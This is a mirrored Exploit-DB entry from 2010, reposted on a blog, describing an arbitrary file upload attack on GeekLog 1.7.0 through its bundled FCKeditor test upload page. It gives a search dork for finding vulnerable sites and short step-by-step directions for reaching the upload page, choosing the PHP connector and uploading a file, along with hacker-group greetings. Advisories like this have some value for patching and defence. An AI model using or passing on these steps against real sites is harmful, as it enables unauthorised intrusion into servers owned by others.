GeekLog 1.7.0 – ‘FCKeditor’ Arbitrary File Upload - 体验盒子

作者： Kubanezi AHG

日期： 2010-10-18

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15277/

################################################### 
#db 8888,ad8888ba,#
# d88b8888 d8"'`"8b # 
#d8'`8b 8888d8' #
# d8'`8b88aaaaaaaa8888#
#d8YaaaaY8b 88""""""""888888888 #
# d8""""""""8b8888Y8,88 #
#d8'`8b 8888 Y8a..a88 #
# d8'`8b8888`"Y88888P"#
# #
# #
###################################################
#
# Exploit Title: Geeklog
# Date: 18-10-2010
# Author: Kubanezi AHG
# Software Link: http://www.geeklog.net/
# Version: 1.7.0
# Tested on: Linux Ubuntu 9.04 
# dork : inurl:"/geeklog/"
# Contact: aldo@dibranet.net 
#
####################################################

exploit # geeklog/fckeditor/editor/filemanager/upload/test.html


first go to # http://site.com/Geeklog/


 then # http://site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html
 
 select # "php"


Upload There Hacked.txtAnd Copy Output Link 

#######################################################
Exploit By Kubanezi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : AHG-Crew , Mistreriozi , Boom ,Twilight , AutoruN , DoctorSQl 
, Drake , Dj-Dukli , EragoN , Khaled , MossaD , BH-TREX